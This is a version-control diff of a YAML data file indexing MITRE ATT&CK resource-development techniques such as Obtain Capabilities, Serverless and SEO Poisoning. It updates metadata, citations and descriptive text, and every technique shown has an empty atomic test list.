-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54129,21 +54770,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -54189,17 +54856,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -54225,7 +54891,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -54257,8 +54923,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -54285,7 +54949,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -54309,8 +54973,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -54336,7 +54998,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -54370,8 +55032,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -54419,7 +55079,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -54435,7 +55095,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -54494,54 +55153,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54552,22 +55167,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -54630,37 +55289,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54684,11 +55344,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -54746,17 +55409,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54764,7 +55428,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -54778,7 +55442,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54811,11 +55475,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -54837,7 +55508,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54855,47 +55526,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54904,21 +55538,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54958,7 +55628,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54977,15 +55647,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
